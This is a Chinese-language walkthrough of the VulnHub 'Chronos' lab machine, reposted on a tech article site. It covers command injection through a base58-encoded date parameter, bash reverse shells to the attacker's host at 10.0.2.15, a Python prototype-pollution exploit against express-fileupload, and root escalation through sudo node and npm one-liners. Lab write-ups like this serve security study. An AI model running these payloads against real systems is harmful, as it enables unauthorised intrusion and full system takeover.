IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> vulnhub chronos -> 正文阅读

[系统运维]vulnhub chronos

靶机下载地址

主机发现

二层扫描:arp-scan -l 或则 netdiscover -r 10.0.2.0/24,扫描得到主机的IP地址10.0.2.6
在这里插入图片描述

信息搜集

通过nmap信息搜集主机信息,得到主机开放了22,80,8000端口,并且用的web服务是通过node.js的Express framework写的,以及中间件是Apache等信息
在这里插入图片描述
然后用浏览器打开这两个端口,发现这两个页面其实是一个页面,知识80端口那个页面是8000端口加了css样式的,然后尝试扫描隐藏目录,并没有什么发现;但是在查看源代码下,发现一段编码的js代码
在这里插入图片描述
在js代码里发现其中有一个http请求,但是需要本地的8000端口才能访问,于是这里需要修改hosts文件/etc/hosts
在这里插入图片描述
修改hosts文件之后,访问并且得到一个关于日期的东西
在这里插入图片描述
在结合前面的url分析,传递一个日期的format,即date的格式化内容,可能那一串编码是有关日期的,需要解码,可能问base64编码,但是解不出来,然后尝试其他base解密,之后发现是base58
base家族解密:base家族解密
解密出来之后,是有关日期的代码
在这里插入图片描述
通过主机是Ubuntu的系统,然后Linux里有date命令,可能是执行了date命令,然后我们在自己的Linux系统下使用了该命令,证实了执行了date命令
在这里插入图片描述

漏洞利用

它能执行系统命令,如果没有过滤,这里可能会造成命令执行漏洞,通过burpsuite抓包,修改base58编码的值为| ls 结果能够返回列出当前目录文件
在这里插入图片描述
这里利用bash反弹shell

| bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'

然后进行base58编码
在这里插入图片描述
再通过burp改包
在这里插入图片描述
虽然这里响应有报错,但是我们监听的端口还是反弹成功了
在这里插入图片描述
通过查看app.js文件,发现代码中过滤了一些关键字,但是后面并没有对这些含有关键字的代码进行删除替换等,从而还是可以连接服务器,导致响应包里会出现错误信息,但还是反弹成功了。
在这里插入图片描述

权限提升

提权三种思路:内核漏洞,suid权限配置不当,sudo权限配置不当
如果遇到思路瓶颈,就对目标系统进行大量的信息搜集,并且使用搜索引擎大量搜索
通过上一级目录的查看,发现有个文件夹里有一个json文件,并且看到了server.js文件,其中还有express-fileupload,结合搜索引擎,发现这个文件上传可能有漏洞,可以利用网上搜索的exp利用
在这里插入图片描述
利用exp利用exp链接

import requests

cmd = 'bash -c "bash -i &> /dev/tcp/10.0.2.15/8888 0>&1"'

# pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

# execute command
requests.get('http://127.0.0.1:8080')

然后在kali机上开启一个http服务,让靶机下载exp

python -m SimpleHTTPServer

然后在靶机上cd到/tmp目录下,执行exp
在这里插入图片描述
执行exp后,直接得到了imera用户权限
在这里插入图片描述
通过查看sudo -l ,发现不需要password就可以用root权限
在这里插入图片描述
通过node提权 sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
在这里插入图片描述
通过npm提权TF=$(mktemp -d) echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json sudo npm -C $TF --unsafe-perm i
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-04-07 23:07:00  更:2022-04-07 23:09:24 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 21:36:39-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码